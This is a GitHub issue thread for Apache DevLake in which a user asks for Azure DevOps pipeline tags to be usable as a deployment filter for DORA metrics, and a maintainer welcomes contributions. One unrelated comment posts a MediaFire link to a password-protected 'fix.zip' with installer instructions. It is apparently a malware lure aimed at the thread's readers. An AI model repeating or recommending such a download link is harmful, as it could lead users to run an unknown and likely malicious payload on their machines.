### ISSUE TITLE
[Feature][Azure Devops] Being able to use tags of pipeline to retrieve deployments for DORA 

### ISSUE THREAD

**Issue by Stepness** [apache/devlake#7956]
### Search before asking

- [X] I had searched in the [issues](https://github.com/apache/incubator-devlake/issues?q=is%3Aissue) and found no similar feature requirement.

### Use case

Because usually in an azure pipeline the name of the environment is either in the stage name or in a tag of the build instead of the job name, it would be useful to use tags as a filter for deployments for DORA metrics

https://learn.microsoft.com/en-us/azure/devops/pipelines/build/build-tag?view=azure-devops&tabs=azure-pipelines-ui

### Related issues

#7955 

### Are you willing to submit a PR?

- [ ] Yes I am willing to submit a PR!

### Code of Conduct

- [X] I agree to follow this project's [Code of Conduct](https://www.apache.org/foundation/policies/conduct)

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by klesh** [comment]
It makes sense to me, anyone who would like to work on it is welcome.
